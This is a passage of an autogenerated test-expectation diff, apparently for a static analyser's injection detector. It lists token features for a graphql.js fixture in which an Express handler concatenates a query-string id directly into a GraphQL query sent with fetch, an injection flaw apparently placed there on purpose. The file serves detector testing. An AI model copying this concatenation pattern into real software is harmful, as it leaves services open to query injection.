+| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:5:78:18 | method: "POST" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:13:78:18 | "POST" | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:13:78:18 | "POST" | InputAccessPathFromCallee | 1.method | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:13:78:18 | "POST" | InputArgumentIndex | 1 | @@ -459,6 +2767,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:13:78:18 | "POST" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:13:78:18 | "POST" | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:78:13:78:18 | "POST" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:79:11 | headers | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:79:11 | headers | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:79:11 | headers | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:79:11 | headers | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:79:11 | headers | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:5:81:5 | headers ... "\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:14:81:5 | {\\n ... "\\n } | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:14:81:5 | {\\n ... "\\n } | InputAccessPathFromCallee | 1.headers | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:14:81:5 | {\\n ... "\\n } | InputArgumentIndex | 1 | @@ -468,6 +2791,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:14:81:5 | {\\n ... "\\n } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:14:81:5 | {\\n ... "\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:79:14:81:5 | {\\n ... "\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:20 | "Content-Type" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:20 | "Content-Type" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:20 | "Content-Type" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:20 | "Content-Type" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:20 | "Content-Type" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:7:80:40 | "Conten ... n/json" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:23:80:40 | "application/json" | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:23:80:40 | "application/json" | InputAccessPathFromCallee | 1.headers.Content-Type | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:23:80:40 | "application/json" | InputArgumentIndex | 1 | @@ -477,6 +2815,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:23:80:40 | "application/json" | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:23:80:40 | "application/json" | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:80:23:80:40 | "application/json" | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:82:8 | body | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:82:8 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:82:8 | body | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:82:8 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:82:8 | body | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:5:91:6 | body: J ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:14 | JSON | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:14 | JSON | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:14 | JSON | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:14 | JSON | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:14 | JSON | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:24 | JSON.stringify | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:24 | JSON.stringify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:24 | JSON.stringify | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:24 | JSON.stringify | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:82:24 | JSON.stringify | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | JSON.st ... \\n }) | CalleeFlexibleAccessPath | fetch | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | JSON.st ... \\n }) | InputAccessPathFromCallee | 1.body | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | JSON.st ... \\n }) | InputArgumentIndex | 1 | @@ -486,6 +2849,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | JSON.st ... \\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | JSON.st ... \\n }) | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | JSON.st ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | exceptional return of JSON.st ... \\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | exceptional return of JSON.st ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | exceptional return of JSON.st ... \\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | exceptional return of JSON.st ... \\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:11:91:6 | exceptional return of JSON.st ... \\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:16:82:24 | stringify | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:16:82:24 | stringify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:16:82:24 | stringify | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:16:82:24 | stringify | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:16:82:24 | stringify | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:26:91:5 | {\\n ... `\\n } | CalleeFlexibleAccessPath | JSON.stringify | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:26:91:5 | {\\n ... `\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:26:91:5 | {\\n ... `\\n } | contextFunctionInterfaces | hello() | @@ -494,6 +2867,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:26:91:5 | {\\n ... `\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:26:91:5 | {\\n ... `\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:82:26:91:5 | {\\n ... `\\n } | receiverName | JSON | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:84:11 | query | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:84:11 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:84:11 | query | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:84:11 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:84:11 | query | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:7:90:8 | query: ... }` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:14:90:8 | `{\\n ... }` | CalleeFlexibleAccessPath | JSON.stringify | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:14:90:8 | `{\\n ... }` | InputAccessPathFromCallee | 0.query | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:14:90:8 | `{\\n ... }` | InputArgumentIndex | 0 | @@ -503,6 +2891,39 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:14:90:8 | `{\\n ... }` | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:14:90:8 | `{\\n ... }` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:14:90:8 | `{\\n ... }` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:15:88:10 | {\\n ... | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:15:88:10 | {\\n ... | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:15:88:10 | {\\n ... | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:15:88:10 | {\\n ... | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:15:88:10 | {\\n ... | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:84:15:88:10 | {\\n ... | stringConcatenatedWith | -endpoint- id + '\n }\n }' | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:13:88:14 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:13:88:14 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:13:88:14 | id | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:13:88:14 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:13:88:14 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:13:88:14 | id | stringConcatenatedWith | '{\n thing {\n name\n url\n ' -endpoint- '\n }\n }' | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:16:90:7 | \\n }\\n } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:16:90:7 | \\n }\\n } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:16:90:7 | \\n }\\n } | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:16:90:7 | \\n }\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:16:90:7 | \\n }\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:88:16:90:7 | \\n }\\n } | stringConcatenatedWith | '{\n thing {\n name\n url\n ' + id -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:94:7 | fetch | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:94:7 | fetch | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:94:7 | fetch | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:94:7 | fetch | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:94:7 | fetch | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | exceptional return of fetch(" ... })\\n }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | exceptional return of fetch(" ... })\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | exceptional return of fetch(" ... })\\n }) | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | exceptional return of fetch(" ... })\\n }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:94:3:112:4 | exceptional return of fetch(" ... })\\n }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| 